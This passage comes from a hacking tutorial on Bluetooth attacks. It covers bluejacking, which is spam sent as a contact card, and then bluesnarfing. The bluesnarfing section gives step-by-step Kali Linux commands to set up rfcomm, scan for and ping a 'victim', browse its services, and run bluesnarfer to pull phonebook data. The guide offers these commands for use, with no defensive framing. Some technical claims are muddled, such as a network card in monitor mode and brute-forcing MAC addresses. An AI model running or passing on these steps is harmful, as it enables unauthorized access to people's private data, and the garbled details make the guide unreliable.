This is like sending unsolicited messages via Bluetooth. It does not gain control of the device; it's essentially spam via OBEX protocol. This can be done by creating a new contact with the message and sending it via Bluetooth.
Preparation: Bluetooth adapter, Kali Linux.
How to Do It:
- Go to contacts and create a new contact.
- Enter the message in the name field.
- Send the contact via Bluetooth.
- Select a target device from the scan.
- Send.
3. Bluesnarfing
This is an unauthorized access to a device, typically a phone or laptop, over a Bluetooth connection. It can allow an attacker to access data like contacts, images, and videos. It often involves brute-forcing the device's MAC address or exploiting vulnerabilities.
Preparation: A wireless network card in monitor mode, Kali Linux, Bluesnarfer tool (or similar).
How to Do It:
- Configure rfcomm:
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0
- Scan for devices:
hcitool scan
- Ping the victim:
l2ping <victim mac addr>
- Browse services:
sdptool browse --tree --l2cap <mac addr>
- Use Bluesnarfer to access data:
bluesnarfer -r 1-100 -C 7 -b <mac addr>